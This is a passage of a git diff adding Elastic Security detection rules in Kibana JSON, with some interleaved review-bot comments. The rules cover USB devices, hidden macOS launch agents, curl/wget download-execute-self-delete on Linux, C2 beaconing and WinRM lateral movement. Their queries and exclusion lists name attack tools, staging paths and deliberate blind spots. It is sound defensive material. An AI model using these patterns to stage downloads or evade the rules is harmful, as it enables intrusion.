+ }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1091", + 
"name": "Replication Through Removable Media", + "reference": "https://attack.mitre.org/techniques/T1091/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/", + "subtechnique": [ + { + "id": "T1052.001", + "name": "Exfiltration over USB", + "reference": "https://attack.mitre.org/techniques/T1052/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_4.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_4.json new file mode 100644 index 00000000000..280e5439712 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_4.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Removable Device", + "new_terms_fields": [ + "registry.path" + ], + "query": "event.category:\"registry\" and host.os.type:\"windows\" and registry.value:\"FriendlyName\" and registry.path:*USBSTOR*\n", + "references": [ + "https://winreg-kb.readthedocs.io/en/latest/sources/system-keys/USB-storage.html", + "https://learn.microsoft.com/en-us/windows-hardware/drivers/usbcon/usb-device-specific-registry-settings" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": 
"T1091", + "name": "Replication Through Removable Media", + "reference": "https://attack.mitre.org/techniques/T1091/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/", + "subtechnique": [ + { + "id": "T1052.001", + "name": "Exfiltration over USB", + "reference": "https://attack.mitre.org/techniques/T1052/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "0859355c-0f08-4b43-8ff5-7d2a4789fc08_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_107.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_107.json new file mode 100644 index 00000000000..711f19c1c43 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_107.json 
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden launch agent or daemon. An adversary may establish persistence by installing a new launch agent or daemon which executes at login.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of Hidden Launch Agent or Daemon", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.path :\n (\n \"/System/Library/LaunchAgents/.*.plist\",\n \"/Library/LaunchAgents/.*.plist\",\n \"/Users/*/Library/LaunchAgents/.*.plist\",\n \"/System/Library/LaunchDaemons/.*.plist\",\n \"/Library/LaunchDaemons/.*.plist\"\n )\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "092b068f-84ac-485d-8a55-7dd9e006715f_107", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_4.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_4.json new file mode 100644 index 00000000000..4145e852a3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_4.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Creation, Execution and Self-Deletion in Suspicious Directory", + "query": "sequence by host.id, user.id with maxspan=1m\n [file where host.os.type == \"linux\" and event.action == \"creation\" and \n process.name in (\"curl\", \"wget\", \"fetch\", \"ftp\", \"sftp\", \"scp\", \"rsync\", \"ld\") and \n file.path : (\"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\",\n \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\")] by file.name\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] by process.name\n [file where host.os.type == \"linux\" and event.action == \"deletion\" and not process.name in (\"rm\", \"ld\") and \n file.path : (\"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\",\n \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\")] by file.name\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "09bc6c90-7501-494d-b015-5d988dc3f233", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "09bc6c90-7501-494d-b015-5d988dc3f233_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_4.json b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_4.json new file mode 100644 index 00000000000..c36563d0f54 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_4.json 
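Review bot: The `setup` text links to `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while every other rule added in this commit links to `fleet/current/agent-policy.html`; the version-pinned 8.10 URL will go stale and is inconsistent with its siblings. Replacing `8.10` with `current` in that one URL aligns the wording. Since this file appears to be an exported artifact, the fix presumably belongs in the upstream rule source.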
@@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A statistical model has identified command-and-control (C2) beaconing activity with high confidence. Beaconing can help attackers maintain stealthy communication with their C2 servers, receive instructions and payloads, exfiltrate data and maintain persistence in a network.", + "from": "now-1h", + "index": [ + "ml_beaconing.all" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Statistical Model Detected C2 Beaconing Activity with High Confidence", + "query": "beacon_stats.beaconing_score: 3\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/beaconing", + "https://www.elastic.co/security-labs/identifying-beaconing-malware-using-elastic" + ], + "related_integrations": [ + { + "package": "beaconing", + "version": "^1.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "beacon_stats.beaconing_score", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "0ab319ef-92b8-4c7f-989b-5de93c852e93", + "setup": "## Setup\n\nThe rule requires the Network Beaconing Identification integration assets to be installed, as well as network logs collected by the Elastic Defend or Network Packet Capture integrations.\n\n### Network Beaconing Identification Setup\nThe Network Beaconing Identification integration consists of a statistical framework to identify C2 beaconing activity in network logs.\n\n#### Prerequisite Requirements:\n- Fleet is required for Network Beaconing Identification.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet 
Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Network Beaconing Identification integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Network Beaconing Identification and select the integration to see more details about it.\n- Under Settings, click \"Install Network Beaconing Identification assets\" and follow the prompts to install the assets.\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Use Case: C2 Beaconing Detection", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/", + "subtechnique": [ + { + "id": "T1102.002", + "name": "Bidirectional Communication", + "reference": "https://attack.mitre.org/techniques/T1102/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "0ab319ef-92b8-4c7f-989b-5de93c852e93_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106.json new file mode 100644 index 00000000000..2eafcd691ef --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106.json 
@@ -0,0 +1,162 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\dbatools\\\\*\\\\allcommands.ps1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.directory": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\*\\\\bin" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.directory": { + "case_insensitive": true, + "value": "?:\\\\ExchangeServer\\\\bin*" + } + } + } + } + ], + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Remote Execution Capabilities via WinRM", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"Invoke-WmiMethod\" or \"Invoke-Command\" or \"Enter-PSSession\") and \"ComputerName\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.directory : (\n \"C:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp\"\n ) and not\n powershell.file.script_block_text : (\n \"Export-ModuleMember -Function @('Invoke-Expression''Invoke-Command')\" and\n \"function Invoke-Command {\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1021/006/", + "https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/PowerShellRemoting.cs", + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/modules/powershell/lateral_movement/invoke_psremoting.py" + ], + "related_integrations": [ + { + 
"package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": 
"https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5.json new file mode 100644 index 00000000000..eb69fc30b78 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5.json 
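Review bot: The `C:\\Program Files\\LogicMonitor\\Agent\\tmp` exclusion is left as a quoted KQL term in `query` while the other three directory exclusions in this version were moved into `filters` as `wildcard` queries with `case_insensitive: true`; `file.directory` is declared `keyword` in `required_fields`, so the remaining term is an exact, case-sensitive match and will not exclude the same path when it is logged with different casing. Adding it as a fourth `filters` entry, `"wildcard": {"file.directory": {"case_insensitive": true, "value": "?:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp"}}`, and dropping the KQL clause would make all four exclusions behave uniformly. The rule also carries no `note` explaining that the directory and `S-1-5-18` exclusions are tuning for known-benign tooling; a sentence such as `Script blocks executed under the SYSTEM account or from the excluded vendor directories are not alerted on; review the write permissions of those paths when tuning.` would tell analysts where the rule is intentionally blind.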
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Remote Execution Capabilities via WinRM", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"Invoke-WmiMethod\" or \"Invoke-Command\" or \"Enter-PSSession\") and \"ComputerName\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.directory : (\n \"C:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp\" or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft\\\\\\\\Exchange?Server\\\\\\\\*\\\\\\\\bin or\n ?\\:\\\\\\\\Logicmonitor\\\\\\\\tmp* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\dbatools\\\\\\\\* or\n ?\\:\\\\\\\\ExchangeServer\\\\\\\\bin*\n ) and not\n powershell.file.script_block_text : (\n \"Export-ModuleMember -Function @('Invoke-Expression''Invoke-Command')\" and\n \"function Invoke-Command {\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1021/006/", + "https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/PowerShellRemoting.cs", + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/modules/powershell/lateral_movement/invoke_psremoting.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": 
"unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_5", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6.json new file mode 100644 index 00000000000..6c0be09cd12 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Remote Execution Capabilities via WinRM", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"Invoke-WmiMethod\" or \"Invoke-Command\" or \"Enter-PSSession\") and \"ComputerName\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.directory : (\n \"C:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\tmp\" or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft\\\\\\\\Exchange?Server\\\\\\\\*\\\\\\\\bin or\n ?\\:\\\\\\\\Logicmonitor\\\\\\\\tmp* or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\dbatools\\\\\\\\* or\n ?\\:\\\\\\\\ExchangeServer\\\\\\\\bin*\n ) and not\n powershell.file.script_block_text : (\n \"Export-ModuleMember -Function @('Invoke-Expression''Invoke-Command')\" and\n \"function Invoke-Command {\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1021/006/", + "https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/PowerShellRemoting.cs", + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/modules/powershell/lateral_movement/invoke_psremoting.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + 
